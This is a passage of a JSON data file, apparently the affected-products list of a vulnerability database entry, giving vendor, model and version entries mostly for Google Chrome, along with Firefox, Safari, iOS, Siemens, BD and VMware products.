        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "1.5.0.7"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1084.29"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "2.0.172"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "19.0.2"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.13"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.696.44"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "1.0.5"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.39"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.472.40"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1272.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.234"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "22.0.1229.33"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "35.0.1916.21"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.171"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "15.0.874.104"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.0"
      },
      {
        "model": "pixel xl",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1700.103"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.650.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.696.19"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "51.0.2704.79"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.648.8"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.338.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.47"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.451.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.912.38"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "33.0.1750.135"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.648.114"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "3.0.3"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.61"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "1.0.154.59"
      },
      {
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "1.3"
      },
      {
        "model": "simatic hmi comfort panels",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "siemens",
        "version": "22"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.156"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.418.5"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1301.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.0.222.0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.58"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "22.0.1229.29"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.75"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "31.0.1650.20"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "15.0.868.0"
      },
      {
        "model": "simatic hmi comfort panels",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "siemens",
        "version": "12"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.536.4"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1304.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.19"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.4"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.17"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1312.45"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1671.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1017.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.82"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.98"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.15"
      },
      {
        "model": "pyxis cubie replenishment station",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bd",
        "version": "0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.30"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.6"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.40"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "33.0.1750.92"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.427.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.5"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "19.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.1.249.1024"
      },
      {
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "8.0.2"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "14.0.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.9"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "34.0.1847.53"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "2.0.172.43"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.0.276.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.60"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.117"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.3"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "23.0.1271.57"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.307.8"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "30.0.1599.87"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.112"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.32"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.46"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.933.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.121"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.14"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.642.0"
      },
      {
        "model": "cortex a57",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "arm",
        "version": "0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.61"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.648.5"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.574.0"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "29"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.936.1"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "2.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "31.0.1650.37"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1500.43"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "2.0.172.38"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.10"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.912.27"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.64"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.317.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "39.0.2171.65"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.320.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "31.0.1650.42"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.696.1"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "3.5.9"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.24"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1500.72"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "32.0.3"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.946.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "15.0.874.48"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "1.0.154.65"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.888.0"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "17.0.5"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.472.37"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.18"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.29"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.17"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.5"
      },
      {
        "model": "security analytics",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bluecoat",
        "version": "7.2"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.54"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1307.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.0.224.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1678.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.472.33"
      },
      {
        "model": "ruggedcom ape",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "siemens",
        "version": "0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.97"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.26"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.517.4"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.704.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.149"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.696.60"
      },
      {
        "model": "bactec fx40",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bd",
        "version": "0"
      },
      {
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "5.0.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.912.24"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.1.249.1035"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "37.0.2062.67"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.0.288.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1291.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.648.68"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.912.43"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.648.59"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "3.6.28"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.15"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.517.14"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.31"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9"
      },
      {
        "model": "vcloud usage meter",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "3.3.3"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.32"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "22.0.1229.60"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "33.0.1750.20"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.912.41"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "29.0.1547.57"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.43"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.472.59"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1084.31"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.0.223.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.632.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.158"
      },
      {
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "5.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "33.0.1750.154"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.328"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "15.0.874.9"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.889.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.61"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.777.2"
      },
      {
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "7.0.5"
      },
      {
        "model": "simatic et 200sp open controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "siemens",
        "version": "0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.34"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.899.0"
      },
      {
        "model": "windows for x64-based systems sp1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "7"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.28"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.418.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "23.0.1271.39"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.1.249.1029"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.28"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.571.0"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "1.5.4"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "34.0.1847.23"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.20"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "22.0.1229.3"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.57"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.696.30"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "5.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.517.13"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "23.0.1271.50"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.648.79"
      },
      {
        "model": "windows version for 32-bit systems",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "1016070"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1677.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.101"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "15.0.874.19"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.76"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.82"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.911.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.734.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "34.0.1847.15"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "23.0.1271.55"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1084.5"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.954.1"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "7.0.5"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "34.0.1847.4"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.418.8"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1312.25"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.667.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.38"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "8.1.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "37.0.2062.14"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1310.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.34"
      },
      {
        "model": "pyxis transfusion verification",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bd",
        "version": "0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "0.9.131.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.342"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "1.512"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.93"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.53"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "30.0.1599.10"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "23.0.1271.16"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.35"
      },
      {
        "model": "vrealize automation",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "6.2.4.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.485.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.48"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.678.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.18"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.16"
      },
      {
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "7.1.3"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.372.0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.27"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.91"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "35.0.1916.77"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.949.0"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "23.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.638.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "54.0.2840.99"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.450.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.392.0"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "32"
      },
      {
        "model": "enterprise linux server extended update support",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "-7.3"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "34.0.1847.44"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.212"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.19"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.0.302.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.1.249.1063"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.710.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.206"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.0.289.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "22.0.1229.56"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.49"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "7.0"
      },
      {
        "model": "firefox",
